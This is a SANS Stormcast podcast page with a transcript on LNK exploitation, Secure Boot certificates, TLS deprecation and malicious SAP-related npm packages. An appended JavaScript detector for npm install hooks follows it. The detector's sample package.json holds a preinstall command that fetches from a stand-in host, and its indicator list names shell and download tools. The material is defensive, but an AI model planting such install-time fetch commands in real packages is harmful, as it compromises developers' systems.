SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

SANS Stormcast Thursday, April 30th, 2026: Odd Requests; MSFT LNK Bug Exploited; Secure Boot Fix; TLS Updates; SAP npm malware

6 min
Apr 30, 2026
Summary

This episode covers four critical security vulnerabilities and threats: Microsoft's LNK file vulnerability being actively exploited before patches were released, expiring Windows Secure Boot certificates from 2011, the deprecation of TLS 1.0/1.1 for Exchange protocols, and malicious SAP-related npm packages using install-time code execution.

Insights
  • Zero-day exploitation before vendor patches are released is becoming more common, requiring faster detection and response mechanisms
  • Legacy certificate and protocol deprecation creates significant operational challenges for enterprises with thousands of systems to inventory and update
  • Supply chain attacks via npm packages continue to evolve with sophisticated install-time execution hooks targeting developer systems
  • Reconnaissance scanning for IoT devices (ESP32) and API gateways suggests attackers are actively fingerprinting infrastructure for future exploitation
  • Organizations must maintain real-time visibility into which systems use deprecated security components to meet compliance deadlines
Trends
  • Pre-patch exploitation of vulnerabilities before vendor disclosure and updates
  • Increased targeting of IoT and embedded devices (ESP32) for firmware manipulation
  • Supply chain compromise through legitimate package repositories with install-time hooks
  • Legacy certificate and protocol deprecation creating enterprise-wide remediation challenges
  • Active reconnaissance scanning for API gateways and IoT endpoints via honeypot detection
  • Nation-state actors (Fancy Bear) leveraging LNK file vulnerabilities against specific targets
  • Enterprise tooling evolution to help identify systems using deprecated security standards
  • TLS protocol enforcement pushing organizations to modernize client infrastructure
Companies
Microsoft
Multiple vulnerabilities discussed: LNK file bug exploited before patch, Secure Boot certificate expiration, TLS depr...
Akamai
Reported that Microsoft's LNK vulnerability was already being exploited before the official patch was released
SAP
Malicious npm packages designed to interface with SAP systems were compromised with install-time code execution hooks
Broadcom
API gateway endpoints detected in honeypot requests, potentially being fingerprinted for reconnaissance purposes
Step Security
Security company that provided comprehensive analysis of the SAP-related npm package supply chain compromise
People
Johannes Ullrich
Hosted the daily cybersecurity podcast episode from Jacksonville, Florida
Quotes
"It's sufficient to just look at a directory that contains the malicious file. And then, first of all, you have the usual sort of SMB connection outbound that leaks potential credentials."
Johannes Ullrich, Microsoft LNK vulnerability discussion
"This is actually sort of long overdue and Microsoft has been holding back for a good reason because there was still a significant number of clients that for whatever reasons didn't support newer versions of TLS."
Johannes Ullrich, TLS 1.0/1.1 deprecation discussion
"If you're using either protocol, then make sure that whatever client you're using is able to connect via TLS 1.2 or 1.3."
Johannes Ullrich, Exchange POP3/IMAP4 protocol guidance
"It's the standard preinstall hook trick that's being used here to execute code on the developer system as these packages are being installed."
Johannes Ullrich, SAP npm malware discussion
Full Transcript
Hello and welcome to the Thursday, April 30th, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu Bachelor's Degree Program in Applied Cybersecurity. In diaries today, nothing too special. There are two odd web requests that sort of caught my eye and that came in via our honeypots. The first one is a request that appears to be going after the Broadcom API gateway. I don't think that's an exploit as is; I think it's really more some kind of fingerprinting or reconnaissance scan. Similar, the second one: the second one is going after what I believe, according to the URL, to be ESP32 devices. Saw something here that this may be used to flash firmware on those devices. If anybody has any more experience with either ESP32 or the Broadcom API gateway, let me know if there is more to these particular endpoints and whether there could be some kind of attack being performed via just these individual requests. And then we got an update to Microsoft Patch Tuesday this month. This update comes from Akamai, in the form of Akamai stating and showing that one of the vulnerabilities being addressed in this month's update has already been exploited before Microsoft actually released the update. This was not indicated in Microsoft's update, so it was not labeled as already exploited. Since then, Microsoft has updated its guidance and now also states that this vulnerability is already being exploited, or had been exploited before the patch was released. This particular vulnerability is one of those LNK file vulnerabilities. Now, what makes it particularly dangerous is that a victim does not actually have to open the file. It's sufficient to just look at a directory that contains the malicious file. And then, first of all, you have the usual sort of SMB connection outbound that leaks potential credentials.
And these credentials can then be used against the victim again. So, yes, certainly a bad vulnerability. It has been used by Fancy Bear against Ukraine, and I'm not sure if anywhere else exploitation has been seen before the patch was released. This is also the second attempt Microsoft made to patch this particular vulnerability. And sticking with Microsoft here for another story. Now, this one is not really a vulnerability story. Instead, it's all about the good old Windows Secure Boot certificate. And well, old is the keyword here. Those boot certificates, originally issued in 2011, are going to expire in June of this year. I mentioned this a couple times before. And of course, many organizations are having a hard time sort of figuring out where these old certificates are being used, and, well, whether or not they have been updated yet. Well, Microsoft updated Microsoft Defender in order to help users find any systems that still need these updates applied. This is particularly geared towards enterprises and such, which of course may have thousands of systems that need to be inventoried here, and this new feature in Microsoft Defender is supposed to help them. Well, in the third Microsoft story here, another TLS-related one, or certificate-related one. Well, this one is actually more about using TLS and certificates on the network. Microsoft in July is also going to turn off TLS 1.0 and 1.1 for any Exchange POP3 and IMAP4 connections. So, yes, you finally must move up all the way to TLS 1.2 and 1.3. This is actually sort of long overdue, and Microsoft has been holding back for a good reason, because there was still a significant number of clients that for whatever reasons didn't support newer versions of TLS. Guess they're now essentially cutting them off. So, if you're still using POP3, and I haven't seen it used in quite a while, IMAP4 is still used quite a bit. So if you're using either protocol, then make sure that whatever client you're using is able to connect via TLS 1.2 or 1.3.
And no podcast episode these days appears to be complete without some kind of supply chain compromise news. The latest is a set of npm packages that are related to SAP. Now, they're not created by SAP, so they're not official packages in that sense, but they're widely used to interface with SAP. There are a number of security companies that found them. The link I'm going to use is Step Security. They have a pretty comprehensive write-up here, but they're not the only ones that sort of wrote up about this compromise. It's the standard preinstall hook trick that's being used here to execute code on the developer system as these packages are being installed, so that's probably why many of the supply chain security tools these days will actually flag this as malicious. Well, and this is it for today. Thanks for listening, thanks for liking, thanks for subscribing, and as always, talk to you again tomorrow. Bye.
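As an added example, not code from the podcast, from Step Security or from the packages discussed, the check below flags the install-time lifecycle scripts an npm package.json declares, which is where the preinstall hook trick described above lives; the package name, the indicator list and the package.json content are constructed for illustration.

```javascript
// Added example, not code from the podcast, Step Security or the packages
// discussed: flag the install-time lifecycle scripts an npm package.json
// declares, since that is where the preinstall hook trick lives.

// Lifecycle scripts npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Substrings that often appear when an install hook fetches or runs a payload
// (constructed list; a real scanner would use a richer rule set).
const SUSPICIOUS = [
  "curl ", "wget ", "node -e", "eval(", "base64", "child_process",
  "powershell", "http://", "https://",
];

// Returns one finding per install-time script: the hook, its command and
// which suspicious substrings (matched case-insensitively) it contains.
function findInstallHooks(pkgJsonText) {
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const lower = cmd.toLowerCase();
    const indicators = SUSPICIOUS.filter((s) => lower.includes(s));
    findings.push({ hook, command: cmd, indicators });
  }
  return findings;
}

// True when any install-time script carries at least one indicator; a benign
// hook such as `node-gyp rebuild` is reported by findInstallHooks but not flagged.
function hasSuspiciousInstallHook(pkgJsonText) {
  return findInstallHooks(pkgJsonText).some((f) => f.indicators.length > 0);
}

// Constructed sample package.json: an inline Node payload in preinstall.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-sap-client",
  version: "1.2.3",
  scripts: {
    preinstall: "node -e \"require('child_process').execSync('curl https://example.invalid/setup')\"",
    test: "jest",
  },
});

for (const f of findInstallHooks(SAMPLE_PACKAGE_JSON)) {
  console.log(`${f.hook}: ${f.command}\n  indicators: ${f.indicators.join(", ")}`);
}
```

Run it against the package.json of each dependency in node_modules to get an inventory of install-time scripts; the indicator list is only a starting heuristic, so review every hook it reports rather than only the flagged ones.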